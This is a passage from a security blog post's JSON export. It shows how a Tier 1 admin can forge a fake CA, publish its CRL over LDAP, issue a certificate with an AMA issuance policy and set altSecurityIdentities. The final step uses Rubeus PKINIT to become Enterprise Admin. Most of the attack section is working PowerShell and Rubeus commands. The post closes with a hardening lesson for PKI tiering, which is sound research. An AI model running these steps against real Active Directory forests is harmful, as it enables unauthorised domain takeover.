#22863A\">&quot;CN=Chrisse Root CA&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Configuration <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $RootDse.Attributes[$ConfigNamingContext][<\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #24292EFF\">]<\/span><\/span>\n<span class=\"line\"><\/span>\n<span 
class=\"line\"><span style=\"color: #24292EFF\">$searchRequest <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">SearchRequest<\/span><span style=\"color: #24292EFF\">]::new([<\/span><span style=\"color: #D32F2F\">String<\/span><span style=\"color: #24292EFF\">]::Format(<\/span><span style=\"color: #22863A\">&quot;CN=CDP,CN=Public Key Services,CN=Services,{0}&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> $Configuration)<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;(objectClass=cRLDistributionPoint)&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">SearchScope<\/span><span style=\"color: #24292EFF\">]::Subtree<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;objectClass&quot;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$searchResponse <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $ldap.SendRequest($searchRequest);<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">if<\/span><span style=\"color: #24292EFF\"> ($searchResponse.Entries.Count <\/span><span style=\"color: #D32F2F\">-eq<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">throw<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">foreach<\/span><span style=\"color: #24292EFF\">($entry 
<\/span><span style=\"color: #D32F2F\">in<\/span><span style=\"color: #24292EFF\"> $searchResponse.Entries)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">if<\/span><span style=\"color: #24292EFF\">($entry.DistinguishedName.StartsWith($CASubject<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">System.StringComparison<\/span><span style=\"color: #24292EFF\">]::CurrentCultureIgnoreCase))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CDPContainer <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $entry.DistinguishedName.IndexOf(<\/span><span style=\"color: #22863A\">&#39;,&#39;<\/span><span style=\"color: #24292EFF\">) <\/span><span style=\"color: #1976D2\">+1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CDPLocation <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $entry.DistinguishedName.Substring($CDPContainer)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">if<\/span><span style=\"color: #24292EFF\"> ($CDPLocation <\/span><span style=\"color: #D32F2F\">-eq<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;&quot;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CDPContainer <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $searchResponse.Entries[<\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: 
#24292EFF\">].DistinguishedName.IndexOf(<\/span><span style=\"color: #22863A\">&#39;,&#39;<\/span><span style=\"color: #24292EFF\">) <\/span><span style=\"color: #1976D2\">+1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CDPLocation <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $searchResponse.Entries[<\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #24292EFF\">].DistinguishedName.Substring($CDPContainer)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #C2C3C5\">#Load the CRL created and signed earlier from file<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CrlBytes <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">System.IO.File<\/span><span style=\"color: #24292EFF\">]::ReadAllBytes(<\/span><span style=\"color: #22863A\">&quot;fakeca.crl&quot;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$addRequest <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">AddRequest<\/span><span style=\"color: #24292EFF\">]::new([<\/span><span style=\"color: #D32F2F\">String<\/span><span style=\"color: #24292EFF\">]::Format(<\/span><span style=\"color: #22863A\">&quot;$CASubject,{0}&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> $CDPLocation)<\/span><span style=\"color: #D32F2F\">,<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">[<\/span><span style=\"color: #D32F2F\">DirectoryAttribute<\/span><span style=\"color: #24292EFF\">]::new(<\/span><span style=\"color: #22863A\">&quot;objectClass&quot;<\/span><span style=\"color: 
#D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;cRLDistributionPoint&quot;<\/span><span style=\"color: #24292EFF\">)<\/span><span style=\"color: #D32F2F\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">[<\/span><span style=\"color: #D32F2F\">DirectoryAttribute<\/span><span style=\"color: #24292EFF\">]::new(<\/span><span style=\"color: #22863A\">&quot;certificateRevocationList&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\">$CrlBytes)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$addResponse <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $ldap.SendRequest($addRequest)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>So now let&#8217;s issue a new certificate from our &#8216;FakeCA&#8217; that includes both the AMA Issuance Policy OID and the CDP extension pointing to an LDAP URI instead of HTTP.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">Issue certificate with AMA extension and LDAP CDP<\/span><span role=\"button\" tabindex=\"0\" data-code=\"Import-Module -Name CertRequestTools\n$AmaExtension = New-CertificatePoliciesExtension -Oid &quot;1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402&quot;\n$CRLDistInfo = [CERTENClib.CCertEncodeCRLDistInfoClass]::new()\n$CRLDistInfo.Reset(1)\n$CRLDistInfo.SetNameCount(0, 1)\n$CRLDistInfo.SetNameEntry(0, 0, 7, 
&quot;ldap:\/\/\/CN=Chrisse Root CA,CN=NTTEST-CA-01,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=nttest,DC=chrisse,DC=com?certificateRevocationList?base?objectClass=cRLDistributionPoint&quot;)\n$CRLDistInfoB64 = $CRLDistInfo.EncodeBlob([CERTENClib.EncodingType]::XCN_CRYPT_STRING_BASE64)\n$CRLDistInfoExtManaged = [System.Security.Cryptography.X509Certificates.X509Extension]::new(&quot;2.5.29.31&quot;, [Convert]::FromBase64String($CRLDistInfoB64), $false)\n\n $params = @{\n    Type = 'Custom'\n    Subject = 'CN=DEMO5 - fakecaso3'\n    #KeySpec = 'Signature'\n    KeyExportPolicy = 'Exportable'\n    KeyLength = 2048\n    HashAlgorithm = 'sha256'\n    NotAfter = (Get-Date).AddMonths(10)\n    CertStoreLocation = 'Cert:\\CurrentUser\\My'\n    # $signer is the 'Fake CA' certificate with private key\n    Signer = $signer\n    TextExtension = @(\n     '2.5.29.37={text}1.3.6.1.5.5.7.3.2',\n     '2.5.29.17={text}upn=caso@nttest.chrisse.com')\n    Extension =  $CRLDistInfoExtManaged, $AmaExtension\n}\nNew-SelfSignedCertificate @params\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #6F42C1\">Import-Module<\/span><span style=\"color: #24292EFF\"> <\/span><span 
style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Name CertRequestTools<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$AmaExtension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #6F42C1\">New-CertificatePoliciesExtension<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Oid <\/span><span style=\"color: #22863A\">&quot;1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfo <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">CERTENClib.CCertEncodeCRLDistInfoClass<\/span><span style=\"color: #24292EFF\">]::new()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfo.Reset(<\/span><span style=\"color: #1976D2\">1<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfo.SetNameCount(<\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">1<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfo.SetNameEntry(<\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">7<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;ldap:\/\/\/CN=Chrisse Root CA,CN=NTTEST-CA-01,CN=CDP,CN=Public Key 
Services,CN=Services,CN=Configuration,DC=nttest,DC=chrisse,DC=com?certificateRevocationList?base?objectClass=cRLDistributionPoint&quot;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfoB64 <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $CRLDistInfo.EncodeBlob([<\/span><span style=\"color: #D32F2F\">CERTENClib.EncodingType<\/span><span style=\"color: #24292EFF\">]::XCN_CRYPT_STRING_BASE64)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfoExtManaged <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">System.Security.Cryptography.X509Certificates.X509Extension<\/span><span style=\"color: #24292EFF\">]::new(<\/span><span style=\"color: #22863A\">&quot;2.5.29.31&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">Convert<\/span><span style=\"color: #24292EFF\">]::FromBase64String($CRLDistInfoB64)<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">$false<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> $params <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">@<\/span><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Type <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;Custom&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Subject <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;CN=DEMO5 - 
fakecaso3&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    <\/span><span style=\"color: #C2C3C5\">#KeySpec = &#39;Signature&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    KeyExportPolicy <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;Exportable&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    KeyLength <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">2048<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    HashAlgorithm <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;sha256&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    NotAfter <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> (<\/span><span style=\"color: #6F42C1\">Get-Date<\/span><span style=\"color: #24292EFF\">).AddMonths(<\/span><span style=\"color: #1976D2\">10<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    CertStoreLocation <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;Cert:\\CurrentUser\\My&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    <\/span><span style=\"color: #C2C3C5\"># $signer is the &#39;Fake CA&#39; certificate with private key<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Signer <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $signer<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    TextExtension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: 
#D32F2F\">@<\/span><span style=\"color: #24292EFF\">(<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">     <\/span><span style=\"color: #22863A\">&#39;2.5.29.37={text}1.3.6.1.5.5.7.3.2&#39;<\/span><span style=\"color: #D32F2F\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">     <\/span><span style=\"color: #22863A\">&#39;2.5.29.17={text}upn=caso@nttest.chrisse.com&#39;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Extension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\">  $CRLDistInfoExtManaged<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> $AmaExtension<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #6F42C1\">New-SelfSignedCertificate<\/span><span style=\"color: #24292EFF\"> @params<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Find any user within the forest where you can write to the &#8216;altSecurityIdentities&#8217; attribute<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">Set-AltSecurityIdentities<\/span><span role=\"button\" tabindex=\"0\" data-code=\"$cert  = ls Cert:\\CurrentUser\\my | where { $_.subject -eq &quot;CN=DEMO5 - fakecaso3&quot; }\n.\\Set-AltSecurityIdentities.ps1 -Identity CASO -MappingType IssuerSerialNumber -Certificate $cert\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg 
xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #24292EFF\">$cert  <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> ls Cert:\\CurrentUser\\my <\/span><span style=\"color: #D32F2F\">|<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">where<\/span><span style=\"color: #24292EFF\"> { <\/span><span style=\"color: #1976D2\">$_.subject<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-eq<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;CN=DEMO5 - fakecaso3&quot;<\/span><span style=\"color: #24292EFF\"> }<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">.<\/span><span style=\"color: #6F42C1\">\\Set-AltSecurityIdentities.ps1<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Identity CASO <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">MappingType IssuerSerialNumber <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Certificate $cert<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Now perform PKINIT using the certificate with the AMA Issuance OID and LDAP CDP, signed by our &#8216;Fake CA&#8217; 
&#8211; nothing can stop us now.<\/p>\n\n\n\n<p>Use Rubeus to perform the PKINIT and, thanks to having the AMA Issuance OID, we should be &#8216;Enterprise Admins&#8217; within the forest.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">cmd<\/span><span role=\"button\" tabindex=\"0\" data-code=\"rubeus asktgt \/user:CASO \/certificate:&lt;HASH&gt; \/enctype:aes256 \/createnetonly:C:\\Windows\\System32\\cmd.exe \/show\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #24292EFF\">rubeus asktgt <\/span><span style=\"color: #D32F2F\">\/<\/span><span style=\"color: #24292EFF\">user:CASO <\/span><span style=\"color: #D32F2F\">\/<\/span><span style=\"color: #24292EFF\">certificate:<\/span><span style=\"color: #D32F2F\">&lt;<\/span><span style=\"color: 
#24292EFF\">HASH<\/span><span style=\"color: #D32F2F\">&gt;<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">\/<\/span><span style=\"color: #24292EFF\">enctype:aes256 <\/span><span style=\"color: #D32F2F\">\/<\/span><span style=\"color: #24292EFF\">createnetonly:C:\\Windows\\System32\\<\/span><span style=\"color: #6F42C1\">cmd.exe<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">\/<\/span><span style=\"color: #24292EFF\">show<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-5-1024x682.png\" alt=\"\" class=\"wp-image-1257\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-5-1024x682.png 1024w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-5-300x200.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-5-768x512.png 768w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-5-1536x1023.png 1536w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-5.png 1600w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p>All it required was altSecurityIdentities + AMA + Cert Publishers &#8211; a T1 admin who had access to an Enterprise CA in T1 and the ability to write &#8216;altSecurityIdentities&#8217; on at least one user within the entire forest, and of course that AMA is being used to safeguard Enterprise Admins.<\/p>\n\n\n\n<p>So to summarise this: <strong>All Enterprise CAs within an Active Directory forest _must_ be managed from T0<\/strong>, otherwise escalation paths like the one just described can be accomplished &#8211; and just think about what we have done here &#8211; even if you&#8217;re not using AMA, there is still a Certificate Authority that is trusted on\/by 
all domain joined devices within the forest, so you can create web-server certificates, code signing certs etc.<\/p>\n\n\n\n<p>Note that all my demos use \u2018<a href=\"https:\/\/github.com\/CarlSorqvist\/PsCertTools\/tree\/main\/CertReqTools\">CertRequestTools<\/a>\u2018 from Carl S\u00f6rqvist and in this case also\u00a0<a href=\"https:\/\/github.com\/GhostPack\/Rubeus\">Rubeus\u00a0<\/a>from Will Schroeder.<\/p>\n\n\n\n<p>Credits to <a href=\"https:\/\/decoder.cloud\/2023\/11\/20\/a-deep-dive-in-cert-publishers-group\/\">&#8220;Decoder&#8217;s&#8221; blog<\/a>, which brought this topic to light; I have just shown that it can be combined with AMA abuse to gain full control of the forest, and written some sample code showing how to create a &#8216;Fake CA&#8217; in PowerShell.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Create, Distribute enforce Trust of a fake CA from T1 &#8211; PKINIT\u2013 altSecurityIdentities + AMA + Cert Publishers Let&#8217;s assume that &#8216;Issuing CA 2&#8217; here is managed from T1 and not trusted in &#8216;NTAuth&#8217; &#8211; should not be a problem or? 
In this scenario a Tier 1 administrator could logon to &#8216;Issuing CA 2&#8217; become &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/blog.chrisse.se\/?p=1247\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;When your Enterprise PKI becomes one of your enemies (Part 6)&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"footnotes":""},"categories":[36],"tags":[32,39,40,30,31],"class_list":["post-1247","post","type-post","status-publish","format-standard","hentry","category-public-key-infrastructure-pki","tag-adcs","tag-ama","tag-fakeca","tag-pki","tag-sitr"],"_links":{"self":[{"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/posts\/1247","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1247"}],"version-history":[{"count":5,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/posts\/1247\/revisions"}],"predecessor-version":[{"id":1259,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/posts\/1247\/revisions\/1259"}],"wp:attachment":[{"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1247"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1247"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.chrisse
.se\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1247"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}